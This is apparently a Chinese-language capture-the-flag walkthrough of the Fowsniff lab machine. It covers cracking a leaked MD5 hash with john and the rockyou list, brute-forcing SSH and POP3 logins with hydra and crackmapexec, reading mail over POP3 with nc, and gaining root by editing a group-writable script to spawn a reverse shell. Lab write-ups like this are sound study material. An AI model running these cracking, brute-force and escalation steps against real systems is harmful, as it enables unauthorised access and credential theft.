前言
hash破解john,hydra,crackmapexec的使用,用户组脚本提权
得用virtual box
信息收集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| 110 pop3 143 imap
README.txt
security.txt
WHAT SECURITY?
''~`` ( o o ) +-----.oooO--(_)--Oooo.------+ | | | FOWSNIFF | | got | | PWN3D!!! | | | | .oooO | | ( ) Oooo. | +---------\ (----( )-------+ \_) ) / (_/
Fowsniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
|
读网站信息,被黑了,有更多信息泄露,还有twitter,但是pastebin的信息已经看不到了,直接看的 https://raw.githubusercontent.com/berzerk0/Fowsniff/main/fowsniff.txt
1 2
| Is that your sysadmin? roflcopter stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
|
说md5不安全,那么我们尝试md5哈希碰撞,先看看是什么类型的hash
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| hash-identifier 8a28a94a588a95b80163709ab4313aa4
sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data
awk -F'' '{print $1}'
crackmapexec ssh 192.168.56.103 -u users -p passwords --continue-on-success
hydra -L users -P passwords -f 192.168.56.103 pop3 -f
|
网络协议 | 菜鸟教程
立足点
1 2 3 4 5 6 7 8 9 10 11
| sudo nc 192.168.56.103 110 user senia pass list retr 1 retr 2 quit
sudo ssh [email protected]
|
提权
1 2 3 4 5
| find / -group users -type f 2>/dev/null -type f
vim /opt/cube/cube.sh
|
当然这里也可以用python3 reverse shell
,我这里就正常用bash
弹
image-20250630141347385